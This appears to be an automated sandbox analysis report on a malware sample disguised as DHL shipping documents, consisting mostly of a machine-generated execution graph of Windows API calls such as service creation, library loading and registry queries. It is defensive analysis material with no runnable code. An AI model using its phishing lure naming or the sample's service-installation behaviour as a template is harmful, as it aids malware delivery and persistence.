                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: lstrlen$CharNextlstrcmpi
                        • String ID:
                        • API String ID: 190613189-0
                        • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                        • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                        • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                        • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:8%
                        Dynamic/Decrypted Code Coverage:5.1%
                        Signature Coverage:6.4%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:131
12698->12695 12700 106b432 12698->12700 12699->12655 12851 106b334 12700->12851 12702 106b43a GetCurrentThreadId 12702->12655 12704 1064348 12703->12704 12705 106bb2e 12703->12705 12709 106b6db GetModuleFileNameW 12704->12709 12706 1064f54 __malloc_crt 70 API calls 12705->12706 12707 106bb54 _memmove 12706->12707 12708 106bb6a FreeEnvironmentStringsW 12707->12708 12708->12704 12710 106b70f _wparse_cmdline 12709->12710 12711 1064f54 __malloc_crt 70 API calls 12710->12711 12712 106b74f _wparse_cmdline 12710->12712 12711->12712 12712->12662 12714 106b925 12713->12714 12715 106b92d __expandlocale 12713->12715 12714->12666 12716 106b94b 12715->12716 12717 1064f0a __calloc_crt 70 API calls 12716->12717 12718 106b956 __expandlocale 12717->12718 12718->12714 12721 106b9ad 12718->12721 12722 1064f0a __calloc_crt 70 API calls 12718->12722 12723 106b9d2 12718->12723 12724 10723f3 __expandlocale 70 API calls 12718->12724 12726 106b9e9 12718->12726 12719 1064ed2 _free 70 API calls 12720 106b9b9 12719->12720 12720->12714 12721->12719 12722->12718 12725 1064ed2 _free 70 API calls 12723->12725 12724->12718 12725->12720 12727 1064748 __expandlocale 8 API calls 12726->12727 12728 106b9f5 12727->12728 12728->12666 12731 10652b5 __IsNonwritableInCurrentImage 12729->12731 13127 106cd3b 12731->13127 12732 10652d3 __initterm_e 12734 10652f4 __IsNonwritableInCurrentImage 12732->12734 13130 106cd26 12732->13130 12734->12670 12736 1061d80 Sleep 12735->12736 12737 1061d8b 12736->12737 12738 1061e09 GetCommandLineW 12737->12738 13195 1063b3a 12737->13195 13227 1061a90 12738->13227 12744 1061e23 12748 1061e60 12744->12748 13236 1061960 MultiByteToWideChar 12744->13236 12745 1061dad 13211 106378c 12745->13211 12747 1061db3 12751 10633b4 _fseek 108 API calls 12747->12751 12752 1061960 9 API calls 12748->12752 12765 1061e64 12748->12765 12808 1061eb0 _vwprintf_helper 12748->12808 12750 10625e0 13269 1061490 12750->13269 12754 1061dbf VirtualAlloc 12751->12754 12755 1061e9b 12752->12755 12753 
1061e4c 12753->12748 13240 1061b50 RegOpenKeyW 12753->13240 13224 1063279 12754->13224 12757 1061e9f 12755->12757 12755->12808 13253 1061700 12757->13253 12762 10625f3 12766 1062674 12762->12766 12767 1062611 lstrlenW 12762->12767 12764 1061ea7 12764->12674 12765->12674 12770 10626a0 12766->12770 12771 1062680 12766->12771 12795 1062632 12766->12795 12768 1062620 CLSIDFromString 12767->12768 12769 106264a 12767->12769 12768->12769 12768->12795 12769->12795 13277 1061860 lstrcpyW lstrlenW 12769->13277 12772 10626a4 12770->12772 12775 10626c4 12770->12775 12776 1062701 12770->12776 13281 10615a0 12771->13281 12772->12674 13287 10612a0 LoadLibraryExW 12775->13287 12777 1062707 12776->12777 12778 106271a 12776->12778 13296 1061060 12777->13296 12782 1062730 12778->12782 12783 1062720 12778->12783 12787 1062736 12782->12787 12794 1062746 12782->12794 13301 10610b0 OpenSCManagerW 12783->13301 13312 10611a0 OpenSCManagerW 12787->13312 12788 1062725 12788->12674 12789 1061960 9 API calls 12789->12808 12792 1062582 lstrlenW 12792->12808 12793 106273b 12793->12674 12794->12795 12797 1061320 117 API calls 12794->12797 12795->12674 12796 10626ed FreeLibrary 12796->12795 12800 1062776 12797->12800 12798 10619f0 9 API calls 12798->12808 12799 106202a lstrlenW 12799->12808 12801 1061430 ExitProcess lstrcpyW 12801->12808 12802 10620e1 lstrlenW 12802->12808 12803 1062f67 110 API calls _fprintf 12803->12808 12804 106224d lstrlenW 12804->12808 12805 1062312 ExitProcess 12806 1061930 9 API calls 12806->12808 12807 1062355 lstrlenW 12807->12808 12808->12750 12808->12789 12808->12792 12808->12794 12808->12798 12808->12799 12808->12801 12808->12802 12808->12803 12808->12804 12808->12805 12808->12806 12808->12807 12809 1062768 12808->12809 13265 10619f0 MultiByteToWideChar 12808->13265 13327 1061320 GetModuleHandleA GetModuleFileNameW 12809->13327 12812 106443f 12811->12812 12813 106443a 12811->12813 12815 106b4d0 __NMSG_WRITE 70 API calls 12812->12815 12814 106b473 __FF_MSGBANNER 70 API 
calls 12813->12814 12814->12812 12816 1064447 12815->12816 12817 1065152 _fast_error_exit 3 API calls 12816->12817 12818 1064451 12817->12818 12818->12652 12820 106b473 __FF_MSGBANNER 70 API calls 12819->12820 12821 1065277 12820->12821 12822 106b4d0 __NMSG_WRITE 70 API calls 12821->12822 12823 106527f 12822->12823 14356 106533a 12823->14356 12827 1065430 _doexit 70 API calls 12826->12827 12828 106556e 12827->12828 12828->12675 12830 1065430 _doexit 70 API calls 12829->12830 12831 10652a5 12830->12831 12831->12678 12833 10653bd __init_pointers __initp_misc_winsig 12832->12833 12863 106cdd9 EncodePointer 12833->12863 12835 10653db 12836 1064e88 12835->12836 12837 1064e94 12836->12837 12838 1064e9a InitializeCriticalSectionAndSpinCount 12837->12838 12839 1064eb7 12837->12839 12838->12837 12839->12687 12844 106bbb1 FlsAlloc 12839->12844 12841 106b460 12840->12841 12842 106b466 12840->12842 12864 106bbbf FlsFree 12841->12864 12842->12842 12844->12691 12847 1064f11 12845->12847 12848 1064f4e 12847->12848 12849 1064f2f Sleep 12847->12849 12865 106ca3e 12847->12865 12848->12695 12850 106bbdb FlsSetValue 12848->12850 12849->12847 12850->12698 12852 106b340 __expandlocale 12851->12852 12900 1064d39 12852->12900 12854 106b376 InterlockedIncrement 12907 106b3ce 12854->12907 12857 1064d39 __lock 69 API calls 12858 106b397 12857->12858 12910 1070061 InterlockedIncrement 12858->12910 12860 106b3b5 12922 106b3d7 12860->12922 12862 106b3c2 __expandlocale 12862->12702 12863->12835 12864->12842 12866 106ca49 12865->12866 12871 106ca64 12865->12871 12867 106ca55 12866->12867 12866->12871 12873 10647cc 12867->12873 12868 106ca74 HeapAlloc 12868->12871 12872 106ca5a 12868->12872 12871->12868 12871->12872 12876 106ce35 DecodePointer 12871->12876 12872->12847 12878 106b2c5 GetLastError 12873->12878 12875 10647d1 12875->12872 12877 106ce48 12876->12877 12877->12871 12892 106bbcd FlsGetValue 12878->12892 12880 106b2da 12881 106b328 SetLastError 12880->12881 12882 1064f0a __calloc_crt 67 
API calls 12880->12882 12881->12875 12883 106b2ed 12882->12883 12883->12881 12893 106bbdb FlsSetValue 12883->12893 12885 106b301 12886 106b307 12885->12886 12887 106b31f 12885->12887 12889 106b334 __initptd 67 API calls 12886->12889 12894 1064ed2 12887->12894 12891 106b30f GetCurrentThreadId 12889->12891 12890 106b325 12890->12881 12891->12881 12892->12880 12893->12885 12895 1064edb HeapFree 12894->12895 12899 1064f04 _free 12894->12899 12896 1064ef0 12895->12896 12895->12899 12897 10647cc __woutput_s_l 68 API calls 12896->12897 12898 1064ef6 GetLastError 12897->12898 12898->12899 12899->12890 12901 1064d5d EnterCriticalSection 12900->12901 12902 1064d4a 12900->12902 12901->12854 12925 1064de1 12902->12925 12904 1064d50 12904->12901 12905 106526f __amsg_exit 69 API calls 12904->12905 12906 1064d5c 12905->12906 12906->12901 13125 1064ebd LeaveCriticalSection 12907->13125 12909 106b390 12909->12857 12911 107007e 12910->12911 12912 1070079 InterlockedIncrement 12910->12912 12913 107008b 12911->12913 12914 1070088 InterlockedIncrement 12911->12914 12912->12911 12915 1070096 12913->12915 12916 1070091 InterlockedIncrement 12913->12916 12914->12913 12917 10700a0 InterlockedIncrement 12915->12917 12918 10700a3 12915->12918 12916->12915 12917->12918 12919 10700ba InterlockedIncrement 12918->12919 12920 10700cd InterlockedIncrement 12918->12920 12921 10700de InterlockedIncrement 12918->12921 12919->12918 12920->12918 12921->12860 13126 1064ebd LeaveCriticalSection 12922->13126 12924 106b3de 12924->12862 12926 1064ded __expandlocale 12925->12926 12927 1064df6 12926->12927 12928 1064e0e 12926->12928 12948 106b473 12927->12948 12931 1064e2e __expandlocale 12928->12931 12993 1064f54 12928->12993 12931->12904 12935 1064e02 12990 1065152 12935->12990 12936 1064e38 12939 1064d39 __lock 69 API calls 12936->12939 12937 1064e29 12938 10647cc __woutput_s_l 69 API calls 12937->12938 12938->12931 12941 1064e3f 12939->12941 12943 1064e63 12941->12943 12944 1064e4e 
InitializeCriticalSectionAndSpinCount 12941->12944 12946 1064ed2 _free 69 API calls 12943->12946 12945 1064e69 12944->12945 12999 1064e7f 12945->12999 12946->12945 13002 106ba03 12948->13002 12950 106b47a 12951 106b487 12950->12951 12952 106ba03 __FF_MSGBANNER 70 API calls 12950->12952 12953 106b4d0 __NMSG_WRITE 70 API calls 12951->12953 12956 1064dfb 12951->12956 12952->12951 12954 106b49f 12953->12954 12955 106b4d0 __NMSG_WRITE 70 API calls 12954->12955 12955->12956 12957 106b4d0 12956->12957 12958 106b4ee __NMSG_WRITE 12957->12958 12960 106ba03 __FF_MSGBANNER 67 API calls 12958->12960 12965 106b615 12958->12965 12962 106b501 12960->12962 12961 106b67e 12961->12935 12963 106b61a GetStdHandle 12962->12963 12964 106ba03 __FF_MSGBANNER 67 API calls 12962->12964 12963->12965 12968 106b628 _strlen 12963->12968 12966 106b512 12964->12966 13085 10678fa 12965->13085 12966->12963 12967 106b524 12966->12967 12967->12965 13032 10723f3 12967->13032 12968->12965 12970 106b661 WriteFile 12968->12970 12970->12965 12972 106b680 12975 1064748 __expandlocale 8 API calls 12972->12975 12973 106b551 GetModuleFileNameW 12974 106b571 12973->12974 12981 106b581 __expandlocale 12973->12981 12976 10723f3 __expandlocale 67 API calls 12974->12976 12977 106b68a 12975->12977 12976->12981 12978 106b694 12977->12978 12979 1064748 __expandlocale 8 API calls 12977->12979 12978->12935 12983 106b6aa 12979->12983 12980 106b5c7 12980->12972 13050 1072387 12980->13050 12981->12972 12981->12980 13041 1072468 12981->13041 12983->12935 12986 1072387 __wsetlocale_get_all 67 API calls 12987 106b5fe 12986->12987 12987->12972 12988 106b605 12987->12988 13059 1072526 EncodePointer 12988->13059 13104 1065120 GetModuleHandleExW 12990->13104 12996 1064f62 12993->12996 12995 1064e22 12995->12936 12995->12937 12996->12995 12997 1064f75 Sleep 12996->12997 13107 106c898 12996->13107 12998 1064f8e 12997->12998 12998->12995 12998->12996 13124 1064ebd LeaveCriticalSection 12999->13124 13001 1064e86 13001->12931 13003 
106ba0d 13002->13003 13004 10647cc __woutput_s_l 70 API calls 13003->13004 13005 106ba17 13003->13005 13006 106ba33 13004->13006 13005->12950 13009 106471d 13006->13009 13012 10646f2 DecodePointer 13009->13012 13013 1064705 13012->13013 13018 1064748 IsProcessorFeaturePresent 13013->13018 13016 10646f2 __invalid_parameter_noinfo_noreturn 8 API calls 13017 1064729 13016->13017 13017->12950 13019 1064753 13018->13019 13024 10645b5 13019->13024 13023 106471c 13023->13016 13025 10645cf _memset ___raise_securityfailure 13024->13025 13026 10645ef IsDebuggerPresent 13025->13026 13027 106bc7c ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 13026->13027 13029 10646b3 ___raise_securityfailure 13027->13029 13028 10678fa __expandlocale 6 API calls 13030 10646d6 13028->13030 13029->13028 13031 106bc67 GetCurrentProcess TerminateProcess 13030->13031 13031->13023 13033 10723fe 13032->13033 13035 107240c 13032->13035 13033->13035 13038 1072425 13033->13038 13034 10647cc __woutput_s_l 70 API calls 13036 1072416 13034->13036 13035->13034 13037 106471d __woutput_s_l 9 API calls 13036->13037 13039 106b544 13037->13039 13038->13039 13040 10647cc __woutput_s_l 70 API calls 13038->13040 13039->12972 13039->12973 13040->13036 13046 1072476 13041->13046 13042 107247a 13043 10647cc __woutput_s_l 70 API calls 13042->13043 13044 107247f 13042->13044 13045 10724aa 13043->13045 13044->12980 13047 106471d __woutput_s_l 9 API calls 13045->13047 13046->13042 13046->13044 13048 10724b9 13046->13048 13047->13044 13048->13044 13049 10647cc __woutput_s_l 70 API calls 13048->13049 13049->13045 13051 10723a1 13050->13051 13053 1072393 13050->13053 13052 10647cc __woutput_s_l 70 API calls 13051->13052 13058 10723ab 13052->13058 13053->13051 13056 10723cd 13053->13056 13054 106471d __woutput_s_l 9 API calls 13055 106b5e7 13054->13055 13055->12972 13055->12986 13056->13055 13057 10647cc __woutput_s_l 70 API calls 13056->13057 13057->13058 13058->13054 13092 106bc0d 
13059->13092 13062 1072617 IsDebuggerPresent 13066 1072621 13062->13066 13067 107263c 13062->13067 13063 1072569 LoadLibraryExW 13064 10725a4 GetProcAddress 13063->13064 13065 1072580 GetLastError 13063->13065 13069 10725b8 7 API calls 13064->13069 13073 1072634 13064->13073 13068 107258f LoadLibraryW 13065->13068 13065->13073 13070 107262f 13066->13070 13071 1072628 OutputDebugStringW 13066->13071 13067->13070 13072 1072641 DecodePointer 13067->13072 13068->13064 13068->13073 13075 1072614 13069->13075 13076 1072600 GetProcAddress EncodePointer 13069->13076 13070->13073 13074 1072680 13070->13074 13077 1072668 DecodePointer DecodePointer 13070->13077 13071->13070 13072->13073 13079 10678fa __expandlocale 6 API calls 13073->13079 13078 10726b8 DecodePointer 13074->13078 13084 10726a4 DecodePointer 13074->13084 13075->13062 13076->13075 13077->13074 13082 10726bf 13078->13082 13078->13084 13081 1072706 13079->13081 13081->12965 13083 10726d0 DecodePointer 13082->13083 13082->13084 13083->13084 13084->13073 13086 1067904 IsProcessorFeaturePresent 13085->13086 13087 1067902 13085->13087 13089 10710b5 13086->13089 13087->12961 13096 1071064 IsDebuggerPresent 13089->13096 13093 106bc4f 13092->13093 13094 106bc1c GetModuleHandleW GetProcAddress 13092->13094 13093->13062 13093->13063 13095 106bc3c 13094->13095 13095->13093 13097 1071079 ___raise_securityfailure 13096->13097 13102 106bc7c SetUnhandledExceptionFilter UnhandledExceptionFilter 13097->13102 13099 1071081 ___raise_securityfailure 13103 106bc67 GetCurrentProcess TerminateProcess 13099->13103 13101 107109e 13101->12961 13102->13099 13103->13101 13105 106514b ExitProcess 13104->13105 13106 1065139 GetProcAddress 13104->13106 13106->13105 13108 106c913 13107->13108 13121 106c8a4 13107->13121 13109 106ce35 __calloc_impl DecodePointer 13108->13109 13111 106c919 13109->13111 13110 106c8af 13112 106b473 __FF_MSGBANNER 69 API calls 13110->13112 13116 106b4d0 __NMSG_WRITE 69 API calls 13110->13116 13120 1065152 
_fast_error_exit 3 API calls 13110->13120 13110->13121 13113 10647cc __woutput_s_l 69 API calls 13111->13113 13112->13110 13115 106c90b 13113->13115 13114 106c8d7 RtlAllocateHeap 13114->13115 13114->13121 13115->12996 13116->13110 13117 106c8ff 13119 10647cc __woutput_s_l 69 API calls 13117->13119 13118 106ce35 __calloc_impl DecodePointer 13118->13121 13122 106c8fd 13119->13122 13120->13110 13121->13110 13121->13114 13121->13117 13121->13118 13121->13122 13123 10647cc __woutput_s_l 69 API calls 13122->13123 13123->13115 13124->13001 13125->12909 13126->12924 13128 106cd3e EncodePointer 13127->13128 13128->13128 13129 106cd58 13128->13129 13129->12732 13133 106cc30 13130->13133 13132 106cd31 13132->12734 13134 106cc3c __expandlocale 13133->13134 13141 106541e 13134->13141 13140 106cc5f __expandlocale 13140->13132 13142 1064d39 __lock 70 API calls 13141->13142 13143 1065425 13142->13143 13144 106cc70 DecodePointer DecodePointer 13143->13144 13145 106cc4d 13144->13145 13146 106cc9d 13144->13146 13155 106cc6a 13145->13155 13146->13145 13158 107295e 13146->13158 13148 106cd00 EncodePointer EncodePointer 13148->13145 13149 106ccaf 13149->13148 13150 106ccd4 13149->13150 13165 1064f9d 13149->13165 13150->13145 13152 1064f9d __realloc_crt 74 API calls 13150->13152 13153 106ccee EncodePointer 13150->13153 13154 106cce8 13152->13154 13153->13148 13154->13145 13154->13153 13191 1065427 13155->13191 13159 1072967 13158->13159 13160 107297c HeapSize 13158->13160 13161 10647cc __woutput_s_l 70 API calls 13159->13161 13160->13149 13162 107296c 13161->13162 13163 106471d __woutput_s_l 9 API calls 13162->13163 13164 1072977 13163->13164 13164->13149 13167 1064fa4 13165->13167 13168 1064fe3 13167->13168 13169 1064fc4 Sleep 13167->13169 13170 106c92a 13167->13170 13168->13150 13169->13167 13171 106c933 13170->13171 13172 106c93e 13170->13172 13174 106c898 _malloc 70 API calls 13171->13174 13173 106c946 13172->13173 13183 106c953 13172->13183 13175 1064ed2 _free 70 API calls 
13173->13175 13176 106c93b 13174->13176 13190 106c94e _free 13175->13190 13176->13167 13177 106c98b 13179 106ce35 __calloc_impl DecodePointer 13177->13179 13178 106c95b HeapReAlloc 13178->13183 13178->13190 13180 106c991 13179->13180 13181 10647cc __woutput_s_l 70 API calls 13180->13181 13181->13190 13182 106c9bb 13185 10647cc __woutput_s_l 70 API calls 13182->13185 13183->13177 13183->13178 13183->13182 13184 106ce35 __calloc_impl DecodePointer 13183->13184 13187 106c9a3 13183->13187 13184->13183 13186 106c9c0 GetLastError 13185->13186 13186->13190 13188 10647cc __woutput_s_l 70 API calls 13187->13188 13189 106c9a8 GetLastError 13188->13189 13189->13190 13190->13167 13194 1064ebd LeaveCriticalSection 13191->13194 13193 106542e 13193->13140 13194->13193 13336 1063b94 13195->13336 13197 1061da1 13198 10633b4 13197->13198 13199 10633c0 __expandlocale 13198->13199 13200 10633ce 13199->13200 13202 10633f4 13199->13202 13201 10647cc __woutput_s_l 70 API calls 13200->13201 13203 10633d3 13201->13203 13900 1062e2a 13202->13900 13205 106471d __woutput_s_l 9 API calls 13203->13205 13210 10633de __expandlocale 13205->13210 13210->12745 13212 1063798 __expandlocale 13211->13212 13213 10637a6 13212->13213 13214 10637bb 13212->13214 13215 10647cc __woutput_s_l 70 API calls 13213->13215 13216 1062e2a __lock_file 71 API calls 13214->13216 13217 10637ab 13215->13217 13218 10637c1 13216->13218 13219 106471d __woutput_s_l 9 API calls 13217->13219 13220 1063433 __ftell_nolock 79 API calls 13218->13220 13223 10637b6 __expandlocale 13219->13223 13221 10637cc 13220->13221 14037 10637ec 13221->14037 13223->12747 14040 1063294 13224->14040 13226 1061ddb #17 13226->12738 14218 1061640 13227->14218 13230 1061add 13232 1061ae4 GetProcessHeap HeapAlloc 13230->13232 13231 1061b38 13231->12744 13233 1061b12 13232->13233 13234 1061b00 GetProcessHeap HeapFree 13232->13234 13233->13231 13235 1061b20 lstrlenW 13233->13235 13234->12744 13235->13231 13235->13235 13237 1061984 lstrlenW 13236->13237 
13238 106197d 13236->13238 13237->13238 13239 1061994 7 API calls 13237->13239 13238->12753 13239->12753 13241 1061b7f 13240->13241 13242 1061b88 RegQueryValueExW 13240->13242 13241->12748 13243 1061c57 RegCloseKey 13242->13243 13244 1061ba9 13242->13244 13243->12748 13244->13243 13245 1061bb3 lstrlenW GetProcessHeap HeapAlloc 13244->13245 13246 1061bf7 _memmove 13245->13246 13247 1061be4 RegCloseKey 13245->13247 13248 1061c07 RegQueryValueExW 13246->13248 13247->12748 13249 1061c36 13248->13249 13250 1061c47 GetProcessHeap HeapFree 13248->13250 13251 1061a90 8 API calls 13249->13251 13250->13243 13252 1061c42 13251->13252 13252->13250 14220 1062d5a 13253->14220 13256 106171e 13256->12764 13259 1061760 GetLastError 13259->12764 13260 106176d CoInitializeEx ReadFile 13261 10617fc CoUninitialize GetLastError 13260->13261 13263 1061792 13260->13263 13261->12764 13262 106179b CreateThread WriteFile 13262->13261 13262->13263 13263->13261 13263->13262 13264 10617e9 ReadFile 13263->13264 13264->13261 13264->13263 13266 1061a14 lstrlenW 13265->13266 13267 1061a0d 13265->13267 13266->13267 13268 1061a24 7 API calls 13266->13268 13267->12792 13268->12792 13270 10614a7 13269->13270 13271 106149e 13269->13271 13272 10614b0 lstrlenW 13270->13272 13271->12762 13272->13272 13273 10614c5 GetProcessHeap HeapAlloc 13272->13273 13276 10614e0 _wcschr _memmove 13273->13276 13274 1061585 13274->12762 13275 1061551 lstrlenW 13275->13276 13276->13274 13276->13275 13280 106187e 13277->13280 13278 10618a4 lstrcatW 13278->12795 13279 106189d 13279->12795 13280->13278 13280->13279 13282 10615b5 lstrlenW 13281->13282 13283 10615c8 GetProcessHeap HeapAlloc 13281->13283 13282->13282 13282->13283 13284 10615e7 13283->13284 13285 1061627 13283->13285 13284->13285 13286 10615f0 lstrlenW lstrcpynW 13284->13286 13285->12674 13286->13284 13288 10612ba _vwprintf_helper 13287->13288 13289 10612d9 GetProcAddress 13287->13289 14286 1062f67 13288->14286 13290 10612e7 _vwprintf_helper 13289->13290 13291 
1061315 13289->13291 13293 1062f67 _fprintf 110 API calls 13290->13293 13291->12795 13291->12796 13295 1061302 FreeLibrary ExitProcess 13293->13295 13294 10612ce ExitProcess 13297 10612a0 115 API calls 13296->13297 13298 106107c 13297->13298 13299 1061082 13298->13299 13300 1061094 FreeLibrary 13298->13300 13299->12674 13300->13299 13302 10610f0 GetSystemDirectoryW lstrcpyW CreateServiceW 13301->13302 13305 10610d1 _vwprintf_helper 13301->13305 13303 1061146 CloseServiceHandle CloseServiceHandle 13302->13303 13304 106115c GetLastError 13302->13304 13303->12788 13306 1061184 CloseServiceHandle 13304->13306 13307 1061169 _vwprintf_helper 13304->13307 13308 1062f67 _fprintf 110 API calls 13305->13308 13306->12788 13310 1062f67 _fprintf 110 API calls 13307->13310 13309 10610e4 13308->13309 13309->12788 13311 106117c 13310->13311 13311->13306 13313 10611d4 OpenServiceW 13312->13313 13314 10611b8 _vwprintf_helper 13312->13314 13315 1061224 GetLastError 13313->13315 13316 10611ec DeleteService 13313->13316 13321 1062f67 _fprintf 110 API calls 13314->13321 13319 1061231 _vwprintf_helper 13315->13319 13320 106124c CloseServiceHandle 13315->13320 13317 10611f7 _vwprintf_helper 13316->13317 13318 1061212 CloseServiceHandle CloseServiceHandle 13316->13318 13323 1062f67 _fprintf 110 API calls 13317->13323 13318->12793 13324 1062f67 _fprintf 110 API calls 13319->13324 13320->12793 13322 10611cb 13321->13322 13322->12793 13325 106120a 13323->13325 13326 1061244 13324->13326 13325->13318 13326->13320 13328 1061356 GetLastError 13327->13328 13329 106135c LoadStringW GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13327->13329 13328->13329 13331 10613fc GetProcessHeap HeapFree GetProcessHeap HeapFree ExitProcess 13329->13331 13332 10613ca 13329->13332 13332->13331 13333 10613ce LoadStringW 13332->13333 13334 1061c70 swprintf 103 API calls 13333->13334 13335 10613f6 13334->13335 13335->13331 13338 1063ba0 __expandlocale 13336->13338 13337 1063bb3 13339 10647cc __woutput_s_l 70 API 
calls 13337->13339 13338->13337 13340 1063be4 13338->13340 13341 1063bb8 13339->13341 13355 106aa26 13340->13355 13343 106471d __woutput_s_l 9 API calls 13341->13343 13354 1063bc3 __expandlocale @_EH4_CallFilterFunc@8 13343->13354 13344 1063be9 13345 1063bf2 13344->13345 13346 1063bff 13344->13346 13347 10647cc __woutput_s_l 70 API calls 13345->13347 13348 1063c29 13346->13348 13349 1063c09 13346->13349 13347->13354 13369 106ab3e 13348->13369 13350 10647cc __woutput_s_l 70 API calls 13349->13350 13350->13354 13354->13197 13356 106aa32 __expandlocale 13355->13356 13357 1064d39 __lock 70 API calls 13356->13357 13366 106aa40 13357->13366 13358 106aab7 13360 1064f54 __malloc_crt 70 API calls 13358->13360 13362 106aabe 13360->13362 13361 106ab2a __expandlocale 13361->13344 13363 106aacd InitializeCriticalSectionAndSpinCount EnterCriticalSection 13362->13363 13367 106aab0 13362->13367 13363->13367 13364 1064de1 __mtinitlocknum 70 API calls 13364->13366 13366->13358 13366->13364 13366->13367 13390 1062e69 13366->13390 13395 1062ed3 13366->13395 13387 106ab35 13367->13387 13378 106ab5e _TestDefaultCountry 13369->13378 13370 106ab78 13371 10647cc __woutput_s_l 70 API calls 13370->13371 13373 106ab7d 13371->13373 13372 106ad33 13372->13370 13376 106ad96 13372->13376 13374 106471d __woutput_s_l 9 API calls 13373->13374 13375 1063c34 13374->13375 13384 1063c56 13375->13384 13402 1072051 13376->13402 13378->13370 13378->13372 13405 10720a5 13378->13405 13381 10720a5 __wcsnicmp 82 API calls 13382 106ad4b 13381->13382 13382->13372 13383 10720a5 __wcsnicmp 82 API calls 13382->13383 13383->13372 13893 1062e99 13384->13893 13386 1063c5c 13386->13354 13400 1064ebd LeaveCriticalSection 13387->13400 13389 106ab3c 13389->13361 13391 1062e74 13390->13391 13392 1062e8a EnterCriticalSection 13390->13392 13393 1064d39 __lock 70 API calls 13391->13393 13392->13366 13394 1062e7d 13393->13394 13394->13366 13396 1062ef4 LeaveCriticalSection 13395->13396 13397 1062ee1 13395->13397 13396->13366 
13401 1064ebd LeaveCriticalSection 13397->13401 13399 1062ef1 13399->13366 13400->13389 13401->13399 13413 1071811 13402->13413 13404 107206a 13404->13375 13406 10720b7 13405->13406 13407 1072143 13405->13407 13409 10647cc __woutput_s_l 70 API calls 13406->13409 13412 106ad2c 13406->13412 13783 1072159 13407->13783 13410 10720d0 13409->13410 13411 106471d __woutput_s_l 9 API calls 13410->13411 13411->13412 13412->13372 13412->13381 13416 107181d __expandlocale 13413->13416 13414 107182f 13415 10647cc __woutput_s_l 70 API calls 13414->13415 13417 1071834 13415->13417 13416->13414 13418 1071866 13416->13418 13419 106471d __woutput_s_l 9 API calls 13417->13419 13424 10718d8 13418->13424 13423 107183e __expandlocale 13419->13423 13421 1071883 13504 10718ac 13421->13504 13423->13404 13508 1066594 InitOnceExecuteOnce 13424->13508 13426 10718f6 13427 10718fa GetLastError 13426->13427 13428 1071919 13426->13428 13547 10647ab 13427->13547 13509 1075003 13428->13509 13431 10647cc __woutput_s_l 70 API calls 13433 1071912 13431->13433 13433->13421 13434 1064748 __expandlocale 8 API calls 13435 1072050 13434->13435 13438 1071811 __wsopen_helper 129 API calls 13435->13438 13436 107193b 13437 1071976 13436->13437 13444 1071999 13436->13444 13453 1071a73 13436->13453 13552 1064798 13437->13552 13440 107206a 13438->13440 13440->13421 13442 10647cc __woutput_s_l 70 API calls 13443 1071988 13442->13443 13446 106471d __woutput_s_l 9 API calls 13443->13446 13445 1071a57 13444->13445 13452 1071a35 13444->13452 13447 1064798 __chsize_s 70 API calls 13445->13447 13446->13433 13448 1071a5c 13447->13448 13449 10647cc __woutput_s_l 70 API calls 13448->13449 13450 1071a69 13449->13450 13451 106471d __woutput_s_l 9 API calls 13450->13451 13451->13453 13516 1070bff 13452->13516 13453->13434 13455 1071b03 13456 1071b2e 13455->13456 13457 1071b0d 13455->13457 13537 10716a2 13456->13537 13458 1064798 __chsize_s 70 API calls 13457->13458 13460 1071b12 13458->13460 13461 10647cc __woutput_s_l 70 API 
calls 13460->13461 13463 1071b1c 13461->13463 13462 1071bce GetFileType 13464 1071c1b 13462->13464 13465 1071bd9 GetLastError 13462->13465 13468 10647cc __woutput_s_l 70 API calls 13463->13468 13555 1070fbc 13464->13555 13469 10647ab __dosmaperr 70 API calls 13465->13469 13466 1071b9c GetLastError 13467 10647ab __dosmaperr 70 API calls 13466->13467 13471 1071bc1 13467->13471 13468->13433 13472 1071c00 CloseHandle 13469->13472 13477 10647cc __woutput_s_l 70 API calls 13471->13477 13472->13471 13476 1071c0e 13472->13476 13473 10716a2 ___createFile 5 API calls 13474 1071b91 13473->13474 13474->13462 13474->13466 13478 10647cc __woutput_s_l 70 API calls 13476->13478 13477->13453 13479 1071c13 13478->13479 13479->13471 13480 1071df4 13480->13453 13500 1071cba 13500->13480 13505 10718d6 13504->13505 13506 10718b2 13504->13506 13505->13423 13782 107103e LeaveCriticalSection 13506->13782 13508->13426 13510 1075022 13509->13510 13511 107500d 13509->13511 13510->13436 13512 10647cc __woutput_s_l 70 API calls 13511->13512 13513 1075012 13512->13513 13514 106471d __woutput_s_l 9 API calls 13513->13514 13515 107501d 13514->13515 13515->13436 13517 1070c0b __expandlocale 13516->13517 13518 1064de1 __mtinitlocknum 70 API calls 13517->13518 13519 1070c1c 13518->13519 13522 1070c21 __expandlocale 13519->13522 13658 1066594 InitOnceExecuteOnce 13519->13658 13521 1070c2e 13521->13522 13523 1064d39 __lock 70 API calls 13521->13523 13522->13455 13532 1070c39 13523->13532 13524 1070d8e 13671 1070da5 13524->13671 13526 1070d15 13527 1064f0a __calloc_crt 70 API calls 13526->13527 13530 1070d1e 13527->13530 13528 1070cb5 EnterCriticalSection 13531 1070cc5 LeaveCriticalSection 13528->13531 13528->13532 13529 1064d39 __lock 70 API calls 13529->13532 13530->13524 13662 1070b73 13530->13662 13531->13532 13532->13524 13532->13526 13532->13528 13532->13529 13533 1070c93 InitializeCriticalSectionAndSpinCount 13532->13533 13659 1070cdd 13532->13659 13533->13532 13536 1070d83 13536->13524 13538 
                        C-Code - Quality: 62%
